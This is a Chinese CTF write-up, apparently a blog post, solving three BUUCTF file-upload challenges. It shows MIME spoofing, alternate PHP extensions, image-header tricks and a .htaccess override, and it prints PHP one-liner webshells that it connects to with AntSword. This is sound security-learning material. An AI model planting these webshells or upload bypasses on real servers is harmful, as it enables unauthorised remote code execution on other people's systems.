[BT]BUUCTF刷题第4天(3.22)

第4天(共3题)

Web

[极客大挑战 2019]Upload

这是文件上传的题目,有一篇比较详细的有关文件上传的绕过方法文件上传漏洞详解(CTF篇)

首先直接上传带一句话木马的php文件,发现被拦截,提示不是图片,先修改MIME,可以看到有效果但是网站能够发现这是php文件

这里用到的是文件后缀名绕过,这道题的题解一般使用phtml后缀,经过测试%00截断也是可以的(其他的后缀还有php,php3,php4,php5,phtml.pht)

结果网站提示它还能发现这不是图片,考虑添加图片文件头,其他题解用的是GIF89a,我使用的是在png文件里添加一句话木马

GIF89a示例:

python 复制代码
GIF89a
<script language="php">eval($_POST['shell']);</script> 

我的示例:

发送后网站又提示不能包含<?,但是可以用js脚本绕过 把`<?php @eval(system($_POST["cmd"]));?>`换成

python 复制代码
<script language="php">eval($_POST['shell']);</script>

文件上传成功,利用蚁剑连接网站目录下的upload/upload.php,成功拿到flag

[ACTF2020 新生赛]Upload

这道题和上一道题极为相似,这里先把鼠标移到对灯泡这里发现上传文件的提示,下面是解题步骤:

  1. 上传普通的png文件
  2. 利用BP抓包在png文件上传内容中插入<?php eval($_POST['cmd']) ?>
  3. 修改文件后缀名为.phtml
  4. 得到返回的文件上传目录(网站会重命名文件)
  5. 利用蚁剑连接


    最终打开终端拿到flag

[MRCTF2020]你传你🐎呢

这道题用后缀名绕过不了,需要上传覆盖.htaccess文件

首先上传.htaccess文件,文件内容是:

python 复制代码
<FilesMatch "upload.png">
SetHandler application/x-httpd-php
</FilesMatch>

这里也是需要用BP抓包修改Content-Type为image/jpeg来绕过检测的

上传成功后再上传一句话木马,直接上传带有木马的png文件(不修改后缀名)

访问图片木马,如图返回说明成功

蚁剑URL地址:http://5883a9b0-b18c-4957-b591-8205dfe17f29.node5.buuoj.cn:81/upload/cd0db1b586ebba4861c4022c59aff656/upload.png

然后在网站根目录下找到flag

相关推荐
小付同学呀21 分钟前
C语言学习(五)——输入/输出
c语言·开发语言·学习
码农阿豪27 分钟前
Nacos 日志与 Raft 数据清理指南:如何安全释放磁盘空间
java·安全·nacos
国科安芯29 分钟前
芯片抗单粒子性能研究及其在商业卫星测传一体机中的应用
嵌入式硬件·安全·fpga开发·性能优化·硬件架构
黑果魏叔29 分钟前
手滑点错更新也不怕!超详细 Mac 系统更新屏蔽指南(附安全恢复方案)
安全·macos
绿蕉29 分钟前
飞机与高铁,谁更安全?——基于中国出行死亡数据的深度对比分析
安全·飞机·高铁
左手厨刀右手茼蒿34 分钟前
Flutter for OpenHarmony: Flutter 三方库 hashlib 为鸿蒙应用提供军用级加密哈希算法支持(安全数据完整性卫士)
安全·flutter·华为·c#·哈希算法·linq·harmonyos
星河耀银海34 分钟前
人工智能大模型的安全与隐私保护:技术防御与合规实践
人工智能·安全·ai·隐私
王码码203535 分钟前
Flutter for OpenHarmony: Flutter 三方库 cryptography 在鸿蒙上实现金融级现代加解密(高性能安全库)
android·安全·flutter·华为·金融·harmonyos
学编程的闹钟1 小时前
E语言计算器开发全攻略
学习
薛定e的猫咪2 小时前
Claude Code 完整学习手册:安装配置、CCR、MCP、插件与 Superpowers开发框架
学习